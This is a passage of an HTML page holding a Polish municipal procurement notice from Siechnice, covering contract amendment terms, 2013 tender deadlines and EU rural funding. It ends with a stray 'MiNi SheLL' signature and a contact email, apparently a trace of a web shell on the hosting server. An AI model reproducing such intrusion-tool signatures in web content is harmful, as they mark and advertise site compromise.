rozliczania umowy lub dokonywania płatności. 3.Zamawiający dopuszcza możliwość zmiany stawki
podatku VAT w przypadku zmiany przepisów dotyczących podatku VAT. 4.Zamawiający zastrzega sobie
prawo zmniejszenia lub zwiększenia zakresu zadania. Zmiany będą dotyczyły tylko zakresu, który wyniknie
w trakcie realizacji zadania a będzie niezbędny do właściwego zakończenia podstawowego zamówienia 5.
Zamawiający dopuszcza zmianę terminu realizacji umowy w przypadku: 1)wystąpienia okoliczności
niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu określonego w Umowie,
termin ten może ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych okoliczności, 2)konieczności
wprowadzenia zmian w dokumentacji projektowej, a wynikających z konieczności dostosowania zakresu
zadania do wytycznych programowych lub powszechnie obowiązujących przepisów prawa lub 3)działaniem
siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub 4)opóźnieniem związanym z uzyskiwaniem
przez Wykonawcę niezbędnych w myśl ustawy Prawo budowlane dokumentów lub 5)innymi
okolicznościami nie powstałymi z winy Wykonawcy lub 6)koniecznością wykonania zamówień
dodatkowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.siechnice.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w
Siechnicach, ul. Jana Pawła II 12, 55-011 Siechnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2013 godzina 11:30, miejsce: Urząd Miejski w Siechnicach, ul. Jana Pawła II 12, 55-011 Siechnice, kancelaria -
parter budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obsarów Wiejskich na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com